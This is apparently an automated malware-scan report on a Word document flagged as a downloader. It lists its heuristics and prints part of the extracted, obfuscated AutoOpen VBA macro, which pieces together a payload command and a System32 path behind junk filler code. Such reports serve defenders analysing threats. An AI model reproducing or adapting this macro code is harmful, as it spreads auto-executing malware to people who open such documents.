Verdict: MALICIOUS
Risk Score: 228

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening. Heuristics indicate the use of CreateObject, suggesting the macro likely downloads and executes a second-stage payload. ClamAV detection confirms its malicious nature as a downloader.
Heuristics (7)

- ClamAV: Doc.Downloader.Stratos-6923060-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Stratos-6923060-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access)
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 222571 bytes | b586b915b86e15a6a8d1cdaff8a287666ee31127423e6236e6155808f3457323 |

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Function vsumi(adoyfv11, ulaazy32, nuxii)
eyge = -133 * 179
End Function
Function hfpvvv(esvai, hyiy, ppmriadb)
oujjoezc = -36 - 95
vxiou = -15 - 108
ilpjgqtrza = -152 / 141
zvtujmo = -174 + 22
End Function
Function auzhaur(xlpuzf, vwvdtfvlmi, klxpoeyi)
bxfzwxqpvxvu = -160 / 178
End Function
Function sbiapyt(ecrauv)
hhfeu6 = -4 / 89
End Function
Function apghxd(mswdua, duipv)
wufweyil = -113 - 43
ounk = -168 * 22
End Function
Function emxse(eovlzge4, rume)
emryfvqbqfo = -127 / 55
End Function
Function izfgejt9(tpaqm)
yilwuywsxt = -34 - 99
End Function
Function ahsnxl(oeynl)
mxjrhmtplgap = -109 - 137
End Function
Function xiugie(yqeh, oqlnwww4, rqxjiet)
yxeh05 = -48 * 7
End Function
Function kpuiz70()
yyiuaf = -100 / 92
End Function
Function awzoia(taoojtc32, okac)
qpex = -55 - 145
ygejleqymv = -86 + 138
meeofm = -173 / 95
awwpdoi = -32 * 176
End Function
Function vdfsddio(cbuika)
aiuujyo = -27 * 130
bwoejtze = -174 + 61
Dim druyixd As Integer
druyixd = -148 / 20
ctisidayu = -165 / 117
End Function
Function spocsea(uksqq, umuict)
Dim ukra As String
ukra = -9 * 5
Dim uaeiuvwzzr As Integer
uaeiuvwzzr = -174 * 79
End Function
Function vrdycdv(eafklmx)
Dim urvhueoof As String
urvhueoof = -122 - 80
trraylrdeqw = -152 / 37
End Function
Sub AutoOpen()
yziygjcngmn = -171 - 149
kjdesir = "fpj+$hkougveut"
vtcnayl = -82 * 165
jixpju = -46 - 6
ajao = -62 - 174
edyub0 = -79 * 129
uadccre14 = "oyejjesgzt"
yaiot = -147 + 139
ohyhhuochy = -174 - 136
Dim yentcohkh As Integer
yentcohkh = -179 + 156
Dim exafszvfmi As String
exafszvfmi = -98 - 117
lvrceilf = -65 / 116
okfitx = "smgxi"
Dim iiiay As String
iiiay = -148 + 47
adayugkrzgp = -94 + 122
yuiov = "r+$soms"
nxepx = "iatsfoihvo"
ymhre = -155 + 91
auykm = -111 - 174
tosluyqk10 = "te"
qllabn = -40 + 87
uvjdodt = "mp"
iiavye = -177 * 55
aeasu81 = -125 / 39
iywnnbtdk23 = tosluyqk10 & uvjdodt
uoepn = -164 / 134
aabvixqbou = -92 / 102
Dim yccmyyxw As Integer
yccmyyxw = -57 / 76
widto = "isnbn"
yeldy = -161 + 47
geidzhpf = -178 - 54
lgmizm = -163 + 83
jyupu = -172 + 2
mlyqroz = "+$lnao"
Dim mvabbez As String
mvabbez = -83 * 126
xkestyxpnay = -28 - 52
nzxrxlyuj50 = -156 + 59
uuycvgd = "uuompyaewhzkizb+$ramr"
Dim kbwyanmjv, taelt, pqakjvj, qjnnhvyuisy As String
kbwyanmjv = -70 + 28
yovrxpyy = -170 / 119
asau6 = -65 * 152
kqjde = -173 * 15
cxtmfuindhb = -69 + 146
kfaywsmzr = "oiuilcqjlrkd"
uyuxbznx1 = -5 / 17
eovmzdon = -99 - 6
vqvpe70 = "u+$yryaieiiptwavdtmzu+$ee"
Dim dhsrvbuuvf As Integer
dhsrvbuuvf = -172 - 132
xjbsggz = -57 / 144
aiuaecc = Environ("SystemRoot")
sxyp2 = -2 * 34
iutvqoii = -127 / 138
hsneo = -91 + 151
muia = -46 * 57
plqyngt = kjdesir & uadccre14 & okfitx & yuiov & nxepx & widto & mlyqroz & uuycvgd & kfaywsmzr & vqvpe70
sfzgchn61 = -154 * 65
jdxnoagvdjxz5 = -91 - 12
Dim wwrzxyy As Integer
wwrzxyy = -95 + 113
miyxrbczzh4 = -25 - 33
Dim owxpqrl As String
owxpqrl = -102 + 7
qfhb = -167 + 115
wxvabajr = -81 / 37
nnidlvvv = -112 / 98
aiuaecc = aiuaecc + "\syste"
jujxan = -158 * 64
rxkui = -154 * 69
ahaiglu0 = -128 * 106
aairzklddxx = -25 * 37
sctuldej = -18 - 48
ooegl = -180 - 112
xjobomo = "m3"
nhwqshe = -125 - 98
niurbofxz = -155 * 142
Dim jdunmya, afbypd, aeouao, rnysdsiob6 As Integer
jdunmya = -152 * 72
oevlidlow0 = -164 * 77
uiiagzaomz = -111 - 178
aiuaecc = aiuaecc + xjobomo
oxue = -51 * 73
Dim yuau As Integer
yuau = -150 * 148
ajaxh = -123 * 67
uyajqcsxz1 = -104 - 96
mndlqriyi7 = -160 + 91
eoieapv = -31 / 45
nphhiuwm = "ayvyojsiulpq="
potagheynr4 = -107 + 149
oumoyzbvp = -91 / 121
dqqlap = -146 + 57
uemetfr = "'ecu';$ar"
gvpqywy = -106 * 31
giqxsqeia = -145 - 63
uyeuj = -171 - 174
iohfyi = "uyvmkaeibnf"
... (truncated)